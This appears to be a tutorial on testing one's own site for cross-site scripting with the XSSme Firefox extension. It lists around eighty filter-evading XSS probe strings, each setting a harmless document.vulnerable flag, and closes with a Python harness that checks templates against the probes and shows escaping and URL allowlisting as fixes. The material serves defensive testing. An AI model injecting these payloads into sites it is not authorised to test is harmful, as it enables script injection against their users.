
XSS pentest plug in – Cross-Site Scripting

Cross-Site Scripting is an extensive topic that has been described in the past by many people. But there is a catch. You open a page and start reading a cool text, with lots of examples and nice colours all around, and after an hour of reading you are still at the beginning. So why should you be able to handle XSS in a short while after reading this AirDump tutorial? That is what this text, Hacking web applications – XSS, answers. First of all, most of the tutorials you find on the web focus on technical and theoretical aspects. Practical hints are missing, and the ones you do find in the examples are not very realistic. To be able to test your own web page you do not need to read tons of text about web attacks or XSS. What is the reality, and what are the useful tips? Here is a practical procedure that you will be able to follow.

All you need is 5 minutes of your time, the Firefox browser, TOR (optional) and one plug-in. At the same time I still hope that the topic of XSS is closed for this century; if you find a writer still at it, refer him to this text :) The Firefox extension is from Security Compass and is called XSSme. Plugin installation is the same as for any other extension (Ad-Block, NoScript, etc.).

The XSSme sidebar is opened from the Tools menu or from the right-click context menu. The control panel opens on the left side. No configuration is necessary; it only depends on what you want to test on the web page. Testing with all the strings in the database can take a bit longer.

Result of testing. 54 strings were tested for XSS vulnerability. The test output is well arranged and is displayed in a new window. The test of the web page AirDump.Net showed that the page is not vulnerable to the XSS test sequences.

XSS strings that are directly available for testing after installation:

<SCRIPT>document.vulnerable=true;</SCRIPT>
<IMG SRC="jav ascript:document.vulnerable=true;">
<IMG SRC="javascript:document.vulnerable=true;">
<IMG SRC=" &#14; javascript:document.vulnerable=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<SCRIPT <B>document.vulnerable=true;</SCRIPT>
<IMG SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true;
<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>
\";document.vulnerable=true;;//
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<BODY BACKGROUND="javascript:document.vulnerable=true;">
<BODY ONLOAD=document.vulnerable=true;>
<IMG DYNSRC="javascript:document.vulnerable=true;">
<IMG LOWSRC="javascript:document.vulnerable=true;">
<BGSOUND SRC="javascript:document.vulnerable=true;">
<BR SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<IMG SRC='vbscript:document.vulnerable=true;'>
¼script¾document.vulnerable=true;¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.vulnerable=true;">
<TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">
<DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">
<DIV STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
<DIV STYLE="width: expression(document.vulnerable=true);">
<STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE>
<STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<BASE HREF="javascript:document.vulnerable=true;//">
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![CDATA[<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C><X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!---->cript:document.vulnerable=true"></B></I><XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true </SCRIPT>"></BODY></HTML>

Other strings can easily be added to the list, manually or by XML import in the interface menu. The extension can be downloaded from the AirDump download subdomain, in the folder XSS.
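The same check XSSme performs in the browser (send each probe, see whether the canary document.vulnerable=true ends up somewhere it would execute) can be run as a regression test against your own templates before the page is ever published. The following Python harness is an added example, not the article's or the XSSme extension's code; render_vulnerable, render_hardened, safe_url and CanaryFinder are assumptions made for the demo, and the probe strings are a constructed subset of the list above. It also shows why plain HTML escaping is not enough on its own: a javascript: URL contains no character that escaping changes, so URL-valued attributes need a scheme allowlist as well.

```python
"""Regression harness for the check XSSme automates: run the probe strings
through a page's rendering and flag any that land in an executable position.
Added example, not the article's or the extension's code; render_vulnerable,
render_hardened, safe_url and CanaryFinder are assumptions made for the demo."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: a subset of the XSSme probe strings listed in the
# article.  Every probe sets document.vulnerable=true if it executes, so
# that substring is the canary we look for.
CANARY = "document.vulnerable=true"
PROBES = [
    '<SCRIPT>document.vulnerable=true;</SCRIPT>',
    '<IMG SRC="javascript:document.vulnerable=true;">',
    '<BODY ONLOAD=document.vulnerable=true;>',
    '<div onmouseover="document.vulnerable=true;">',
    '<img src="blah"onmouseover="document.vulnerable=true;">',
    'javascript:document.vulnerable=true;',
]
# Attributes whose value the browser treats as a URL (scheme-sensitive).
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "action"}


def render_vulnerable(name: str, homepage: str) -> str:
    """'Before': raw string concatenation into HTML, the pattern XSSme flags."""
    return f'<p>Hello {name}</p><a href="{homepage}">home</a>'


def safe_url(url: str) -> str:
    """Allowlist http(s) for URL-valued attributes, else neutralise to '#'.
    Escaping alone does not stop javascript:/vbscript: URLs, because the
    scheme contains no characters that HTML escaping changes."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_hardened(name: str, homepage: str) -> str:
    """'After': context-aware output encoding (HTML body text + URL attribute)."""
    return (f'<p>Hello {html.escape(name, quote=True)}</p>'
            f'<a href="{safe_url(homepage)}">home</a>')


class CanaryFinder(HTMLParser):
    """Records where the canary lands in an executable position: script
    text, an on* event-handler attribute, or a URL-valued attribute.
    Escaped text (&lt;script&gt;...) is delivered as data outside <script>,
    so it is correctly not counted."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for attr, value in attrs:
            if value and CANARY in value and (attr.startswith("on") or attr in URL_ATTRS):
                self.hits.append(f"<{tag} {attr}>")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and CANARY in data:
            self.hits.append("<script> body")


def executable_positions(page: str) -> list:
    """Parse a rendered page; return the executable positions holding the canary."""
    finder = CanaryFinder()
    finder.feed(page)
    finder.close()
    return finder.hits


def audit(render) -> dict:
    """Run each probe through both template slots (text and URL) of `render`;
    return {probe: [positions]} for probes that survive as live markup."""
    findings = {}
    for probe in PROBES:
        for page in (render(probe, "https://example.org/"), render("guest", probe)):
            hits = executable_positions(page)
            if hits:
                findings.setdefault(probe, []).extend(hits)
    return findings


if __name__ == "__main__":
    print("vulnerable template:", audit(render_vulnerable))
    print("hardened template:  ", audit(render_hardened))
```

Run it and the vulnerable template reports every probe, while the hardened template reports none. The parser-based check is deliberately stricter than grepping for the canary string: the canary survives HTML escaping unchanged, so what matters is whether it sits in script text, an on* handler or a URL attribute, which is exactly what the browser would act on.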
